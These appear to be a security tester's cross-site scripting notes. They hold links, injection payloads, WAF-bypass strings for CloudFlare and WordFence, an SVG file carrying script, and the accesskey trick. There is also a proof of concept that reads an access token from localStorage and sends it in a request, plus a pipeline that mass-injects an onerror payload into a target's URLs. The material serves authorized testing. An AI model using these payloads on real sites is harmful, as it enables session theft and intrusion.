Resources
- https://twitter.com/garethheyes (Knowledgeable in XSS)
Identification
Simple Injection Payloads
- Escaping context:
%27-alert(document.domain)-%27
XSS Polyglots
- https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
XSS Filter Evasion Cheat Sheet
- https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html
Prototype Pollution
- https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#prototype-pollution
Proof of Concept
Local Storage Access Token Proof of Concept
https://medium.com/redteam/stealing-jwts-in-localstorage-via-xss-6048d91378a0
with({xhr: new XMLHttpRequest()}){
xhr.open('PUT', '[URL]', true);
xhr.setRequestHeader('Accept', 'application/json');
xhr.setRequestHeader('Content-Type', 'application/json;');
xhr.setRequestHeader('Authorization', 'Bearer ' + localStorage['accessToken']);
xhr.send(JSON.stringify({[JSON PAYLOAD]}));
}
XSS in SVG File
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("XSS");
</script>
</svg>
Creating a login phishing page using application elements
## XSS Bypasses
**Resources**
+ https://waf-bypass.com/tag/cloudflare/
CloudFlare and WordFence
xss">x%253Csvg%2520onload=alert%26%230000000040"1")%253E ```
Special Cases
GitLab: Bypass File Upload Restrictions to inject double quotes
https://www.youtube.com/watch?v=5dneugeMSso
Filename Regex
Bypassing Validator
Data-original
CSP Bypass (Use Google JSONP API)
Preventing XSS in Salesforce
Server-side Scripting Language https://ampscript.guide/language/#:~:text=Unlike%20other%20general%2Dpurpose%20languages,when%20the%20content%20is%20rendered.
Tainted parameter variables in Ampscript https://ampscript.guide/requestparameter/
- Follow tainted variables until a sink is found, such as output in HTML
- %% is pre-processing tag, similar to <?php
- Server-side Javascript (SSJS) is used, where some code runs before the page renders and some runs in the browser
- https://developer.salesforce.com/docs/marketing/marketing-cloud/guide/ssjs_serverSideJavaScript.html
- Salesforce has many flavours including lightningscript and ampscript
https://developer.salesforce.com/docs/atlas.en-us.pages.meta/pages/pages_security_tips_xss.htm
Noscript Google XSS
https://www.youtube.com/watch?v=gVrdE6g_fa8
Access Key
If your input is reflected inside “unexpoitable tags” you could try the accesskey trick to abuse the vuln (you will need some kind of social engineer to exploit this): " accesskey="x" onclick="alert(1)" x="
https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting
Universal XSS using iCloud
- https://www.youtube.com/watch?v=Yt1a3j-U2zI
XSS via Markdown
- https://medium.com/taptuit/exploiting-xss-via-markdown-72a61e774bf8
Payload from Twitter
echo https://target.com | waybackurls | grep "=" | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|icon|pdf|svg|txt|js)" | uro | qsreplace '"><img src=x onerror=alert(1);>' | freq